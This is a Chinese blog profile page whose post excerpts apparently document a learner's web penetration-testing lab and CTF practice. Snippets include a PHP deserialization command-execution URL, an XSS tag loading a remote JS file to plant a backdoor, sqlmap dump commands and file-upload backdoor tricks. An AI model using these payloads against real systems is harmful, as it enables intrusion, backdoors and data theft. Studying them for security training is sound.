重庆第一单纯渗透佬
码龄10年
关注
提问 私信
  • 博客:8,326
    8,326
    总访问量
  • 20
    原创
  • 97,766
    排名
  • 136
    粉丝
  • 0
    铁粉
  • 学习成就
IP属地以运营商信息为准,境内显示到省(区、市),境外显示到国家(地区)
IP 属地:安徽省
  • 加入CSDN时间: 2014-06-06
博客简介:

qq_16163981的博客

查看详细资料
  • 原力等级
    成就
    当前等级
    2
    当前总分
    134
    当月
    1
个人成就
  • 获得182次点赞
  • 内容获得4次评论
  • 获得72次收藏
创作历程
  • 20篇
    2024年
成就勋章
创作活动更多

如何做好一份技术文档?

无论你是技术大神还是初涉此领域的新手,都欢迎分享你的宝贵经验、独到见解与创新方法,为技术传播之路点亮明灯!

177人参与 去创作
  • 最近
  • 文章
  • 代码仓
  • 资源
  • 问答
  • 帖子
  • 视频
  • 课程
  • 关注/订阅/互动
  • 收藏
搜TA的内容
搜索 取消

PHP反序列化system代码执行

http://192.168.1.5/pop/3.php?x=O:1:"B":1:{s:3:"cmd";s:8:"ipconfig";}
原创
发布博客 2024.08.11 ·
172 阅读 ·
3 点赞 ·
0 评论 ·
0 收藏

060 PHP反序列化&POP链构造&魔术方法流程&漏洞触发条件&属性修改

如果一个对象类中存在__toString魔术方法,这个对象类被当做字符串进行处理时,就会触发__toString魔术方法。// echo '__get 不存在成员变量'.$name.'
';// // __get():访问不存在的成员变量时调用。//// 不存在成员变量spaceman,所以调用__get。////将对象当做函数调用 触发__invoke魔术方法。// 不存在xiaodi方法 触发__call魔术方法。//// 存在成员变量n,所以不调用__get。
原创
发布博客 2024.08.09 ·
279 阅读 ·
10 点赞 ·
0 评论 ·
1 收藏

XSS http://xss-ctf.xiejiahe.com/

事件关键字过滤 利用其他标签调用 双引号闭合。、全部实体化 利用标签事件 单引号闭合。、全部实体化 利用标签事件 双引号闭合。、利用Unicode编码(内容检测)、利用Unicode编码。、利用大小写未正则匹配。、实体化 输入框没有。
原创
发布博客 2024.07.05 ·
334 阅读 ·
4 点赞 ·
0 评论 ·
4 收藏

055 XSS跨站 JS后门植入&CSP策略&HttpOnly

后台用户名输入 <script src="http://1.14.97.254/poc1.js"></script> 访问poc1.js文件触发跨站生成后门文件1.php。内容安全策略是一种可信白名单机制,来限制网站中是否可以包含某来源内容。该制度明确告诉客户端,哪些外部资源可以加载和执行,等同于提供白名单,禁止未授权的脚本执行(新特性,Google Map 移动版在使用)。禁止外域提交,网站被攻击后,用户的数据不会泄露到外域。禁止加载外域代码,防止复杂的攻击逻辑。,利于尽快修复问题。
原创
发布博客 2024.07.04 ·
149 阅读 ·
4 点赞 ·
0 评论 ·
2 收藏

050 文件删除

于是我们在../templets../index.php。只允许../templets文件夹里面的文件。就能翻过文件夹删除其他文件。
原创
发布博客 2024.06.08 ·
156 阅读 ·
1 点赞 ·
0 评论 ·
0 收藏

050 命令

读取flag.php。
原创
发布博客 2024.06.08 ·
130 阅读 ·
2 点赞 ·
0 评论 ·
0 收藏

050 文件包含testphp.vulnweb.com/showimage.php?file=showimage.php

靶场地址testphp.vulnweb.com/showimage.php?
原创
发布博客 2024.06.08 ·
250 阅读 ·
3 点赞 ·
0 评论 ·
0 收藏

050 伪协议文件读取&文件写入&代码执行

伪协议文件读取文件读取: ../上级目录绝对路径file相对路径php。
原创
发布博客 2024.06.08 ·
355 阅读 ·
3 点赞 ·
1 评论 ·
4 收藏

048 Apache HTTPD 换行解析漏洞(CVE-2017-15715)

加个空格改成0a 然后访问 存在解析漏洞。
原创
发布博客 2024.06.07 ·
91 阅读 ·
2 点赞 ·
0 评论 ·
0 收藏

047 代码缺陷

【代码】047 代码缺陷。
原创
发布博客 2024.06.05 ·
128 阅读 ·
1 点赞 ·
0 评论 ·
0 收藏

047 PHP上传 6-10题 黑名单&%00截断&黑名单缺陷&逻辑缺陷

PHP 内核是由 C 语言实现的,所以使用了 C 语言中的一些字符串处理函数。所以在这个地方,攻击者只要在最后加入一个 0 字节,就能截断 file 变量之后的字符串 PHP小于5.3版本可以输入a.php%00进行截断。然后不停的访问上传shell.php和不停的访问upload/shell.php就能生成xiao.php。禁止后缀为php的文件上传,由于系统特性区分大小写 于是可以1.PHp上传。写一个shell.php访问就生成一个xiao.php的后门文件。因为在下面 所以要对%00进行解码。
原创
发布博客 2024.06.05 ·
516 阅读 ·
16 点赞 ·
0 评论 ·
1 收藏

047 php上传1-5关 JS绕过&htaccess&MIME类型&检测头部&逻辑漏洞

通过白名单 只允许上传jpg.png.gif文件改成1.php发送即可。
原创
发布博客 2024.06.04 ·
929 阅读 ·
21 点赞 ·
0 评论 ·
5 收藏

046 sql-代理

python .\sqlmap.py -u "http://localhost/new.php?id=1" --level=3 --risk=2 --proxy "http://127.0.0.1:8080/"
原创
发布博客 2024.06.01 ·
105 阅读 ·
3 点赞 ·
0 评论 ·
0 收藏

046-sql等级风险

等级5 风险3压力拉满。
原创
发布博客 2024.06.01 ·
174 阅读 ·
2 点赞 ·
0 评论 ·
0 收藏

046 sql-过滤

编写过滤脚本文件注入成功。
原创
发布博客 2024.06.01 ·
302 阅读 ·
9 点赞 ·
0 评论 ·
0 收藏

046 sql-base64

引用模块 --tamper=base64code。注入点是base64编码。引用base64模块。
原创
发布博客 2024.06.01 ·
274 阅读 ·
6 点赞 ·
0 评论 ·
0 收藏

046 sqlmap-数据包注入

先复制请求表头并保存在sqlmap的跟目录命名为head.txt 再把注入点打上*号。
原创
发布博客 2024.05.30 ·
645 阅读 ·
28 点赞 ·
0 评论 ·
0 收藏

046 sqlmap-post

所以我们的注入语句应该是:python ./sqlmap.py "http://testphp.vulnweb.com/userinfo.php" --data "uname=test&pass=test" --tables。抓取登录数据包表单数据:uname=test&pass=test。
原创
发布博客 2024.05.30 ·
378 阅读 ·
4 点赞 ·
1 评论 ·
4 收藏

046 sqlmap-get

id=2" --dump -C "password,username,id" -T "admin" -D "demo01" 得到信息。权限都是有的,莫非我们不是root?emmmm不知道奥哈哈 反正不是root也不能确定。
原创
发布博客 2024.05.29 ·
1204 阅读 ·
45 点赞 ·
2 评论 ·
32 收藏

041 asp

用Linux输入msfconsole设置端口set rhosts 192.168.37.129run蓝屏成功IIS
原创
发布博客 2024.05.24 ·
1756 阅读 ·
15 点赞 ·
0 评论 ·
19 收藏
加载更多